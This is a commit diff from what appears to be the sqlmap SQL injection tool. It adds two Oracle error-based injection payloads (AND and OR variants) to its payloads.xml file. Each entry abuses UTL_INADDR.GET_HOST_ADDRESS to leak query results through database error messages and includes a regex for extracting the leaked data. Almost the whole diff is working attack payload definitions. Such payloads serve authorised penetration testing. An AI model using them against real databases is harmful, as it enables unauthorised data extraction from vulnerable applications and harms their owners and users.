Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 956a155

Browse files
committed
adding one more error based payload for Oracle
1 parent ff43a4a commit 956a155

1 file changed

Lines changed: 38 additions & 0 deletions

File tree

xml/payloads.xml

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -773,6 +773,25 @@ Formats:
773773
</details>
774774
</test>
775775

776+
<test>
777+
<title>Oracle AND error-based - WHERE clause (utl_inaddr.get_host_address)</title>
778+
<stype>2</stype>
779+
<level>2</level>
780+
<risk>0</risk>
781+
<clause>1</clause>
782+
<where>1</where>
783+
<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')</vector>
784+
<request>
785+
<payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')</payload>
786+
</request>
787+
<response>
788+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
789+
</response>
790+
<details>
791+
<dbms>Oracle</dbms>
792+
</details>
793+
</test>
794+
776795
<test>
777796
<title>Firebird AND error-based - WHERE clause</title>
778797
<stype>2</stype>
@@ -869,6 +888,25 @@ Formats:
869888
</details>
870889
</test>
871890

891+
<test>
892+
<title>Oracle OR error-based - WHERE clause (utl_inaddr.get_host_address)</title>
893+
<stype>2</stype>
894+
<level>3</level>
895+
<risk>2</risk>
896+
<clause>1</clause>
897+
<where>2</where>
898+
<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')</vector>
899+
<request>
900+
<payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')</payload>
901+
</request>
902+
<response>
903+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
904+
</response>
905+
<details>
906+
<dbms>Oracle</dbms>
907+
</details>
908+
</test>
909+
872910
<test>
873911
<title>Firebird OR error-based - WHERE clause</title>
874912
<stype>2</stype>

0 commit comments

Comments
 (0)